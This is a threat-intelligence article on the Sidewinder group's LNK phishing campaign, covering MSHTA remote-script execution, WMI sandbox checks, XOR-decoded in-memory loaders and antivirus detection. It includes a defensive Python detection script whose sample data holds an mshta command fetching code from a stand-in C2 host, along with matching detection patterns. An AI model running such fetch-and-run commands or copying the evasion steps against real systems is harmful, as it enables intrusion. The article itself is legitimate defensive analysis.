The notorious APT-C-24 threat actor group, commonly known as Sidewinder or Rattlesnake, has evolved its attack methodology by deploying sophisticated LNK file-based phishing campaigns targeting government, energy, military, and mining sectors across South Asia.
Active since 2012, this advanced persistent threat organization has shifted away from its traditional exploitation of Microsoft Office vulnerabilities, instead embracing a more stealthy approach using weaponized shortcut files to execute remote malicious scripts.
Recent attack samples discovered by security researchers reveal a carefully orchestrated campaign where victims receive compressed archives containing three malicious LNK files, each designed with dual extensions such as “file 1.docx.lnk,” “file 2.docx.lnk,” and “file 3.docx.lnk.”
These deceptive filenames are strategically crafted to appear as legitimate document files, exploiting user trust and increasing the likelihood of execution.
The attackers have refined their delivery mechanism to maximize infection probability by providing multiple entry points within a single package.
Ctfiot analysts identified that these LNK files leverage the Microsoft HTML Application Host (MSHTA) program to execute malicious scripts hosted on remote command-and-control servers.
The remote URLs exhibit a distinctive pattern, terminating with parameters “yui=0,” “yui=1,” and “yui=2,” serving as unique identifiers for each variant while maintaining functional similarity across all three files.
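The two observables described above, the double-extension shortcut names and MSHTA launching a remote URL with a "yui=N" parameter, can be turned into simple triage rules. The following is an added example written for this article, not code from the original report or from Ctfiot; the process-creation records, the host names and the field names are constructed for the demonstration.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry).
# The C2 host uses the reserved .invalid TLD so it can never resolve.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe https://example-c2.invalid/load?yui=1"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe C:\Users\alice\AppData\Local\tool.hta"},
    {"image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"WINWORD.EXE" C:\Users\alice\report.docx'},
]

REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
# "file 1.docx.lnk" style names: a document extension followed by .lnk
DOUBLE_EXT_LNK = re.compile(r"\.(docx?|xlsx?|pptx?|pdf)\.lnk$", re.IGNORECASE)
# The URL parameter pattern reported in this campaign (yui=0, yui=1, yui=2)
YUI_PARAM = re.compile(r"[?&]yui=\d")


def classify_event(event):
    """Return a list of rule names that fire on one process-creation record."""
    findings = []
    if event["image"].lower().endswith("mshta.exe"):
        url = REMOTE_URL.search(event["cmdline"])
        if url:
            # mshta.exe pulling an HTA from a remote host is rare in normal use
            findings.append("mshta_remote_url")
            if YUI_PARAM.search(url.group(0)):
                findings.append("sidewinder_yui_param")
    return findings


def flag_archive_members(names):
    """Return archive member names that use a document.lnk double extension."""
    return [n for n in names if DOUBLE_EXT_LNK.search(n)]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["cmdline"], "->", classify_event(ev))
    print(flag_archive_members(["file 1.docx.lnk", "notes.txt", "real.docx"]))
```

The archive check is meant to run on the member list of the inbound compressed file, before anything is extracted.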
The attack methodology demonstrates sophisticated environmental awareness capabilities, with the malicious scripts performing comprehensive system reconnaissance before proceeding with payload deployment.
Upon execution, the initial JavaScript component conducts anti-analysis checks by querying system specifications through Windows Management Instrumentation (WMI), specifically examining processor core counts and physical memory allocation to distinguish between genuine target environments and security research sandboxes.
Advanced Evasion and Payload Deployment Mechanisms
The group’s technical sophistication becomes evident in its multi-layered obfuscation techniques and conditional payload delivery system.
The initial HTML application performs dual functionality by simultaneously deploying decoy content to maintain victim deception while establishing persistence through memory-resident attack components.
The malicious script queries processor cores using “SELECT NumberOfCores FROM Win32_Processor” and requires a minimum of two cores alongside 810MB of physical memory before proceeding with payload decryption.
Once the environmental checks pass, the script applies Base64 decoding followed by XOR decryption to recover a heavily obfuscated C# downloader component, which it then loads reflectively in memory.
This sophisticated payload performs security software detection, scanning for processes associated with Kaspersky, ESET, and other endpoint protection solutions before establishing communication with command-and-control infrastructure.
The attackers demonstrate operational security awareness by rapidly rotating compromised domains and selectively delivering advanced payloads only to victims meeting specific targeting criteria, significantly complicating security research efforts and threat hunting activities.